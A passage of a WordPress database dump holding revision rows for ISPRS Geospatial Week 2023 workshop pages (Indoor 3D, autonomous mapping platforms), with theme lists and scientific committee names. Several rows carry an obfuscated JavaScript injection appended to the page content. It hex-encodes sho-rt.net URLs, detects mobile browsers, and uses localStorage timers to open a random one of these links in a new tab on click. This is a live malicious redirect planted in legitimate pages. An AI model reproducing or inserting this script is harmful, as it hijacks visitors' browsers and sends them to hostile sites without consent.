Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2022-11-25 22:59:46','2022-11-25 22:59:46','',3266,'https://gsw2023.com/?p=3378',0,'revision','',0),
(3379,1,'2022-11-25 23:04:09','2022-11-25 23:04:09','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h1 style=\"text-align: left;\">CHAIR</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h1 style=\"text-align: left;\">SECRETARY</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>LBS in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovative LBS systems and applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Smart facility maintenance</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor location-linked big data</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>SLAM methods in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Human environment interactions in mobility context</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mobility and assistive technologies</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yongze Song, Curtin University</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-11-25 23:04:09','2022-11-25 23:04:09','',2586,'https://gsw2023.com/?p=3379',0,'revision','',0),
(3380,1,'2022-11-25 23:06:14','2022-11-25 23:06:14','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 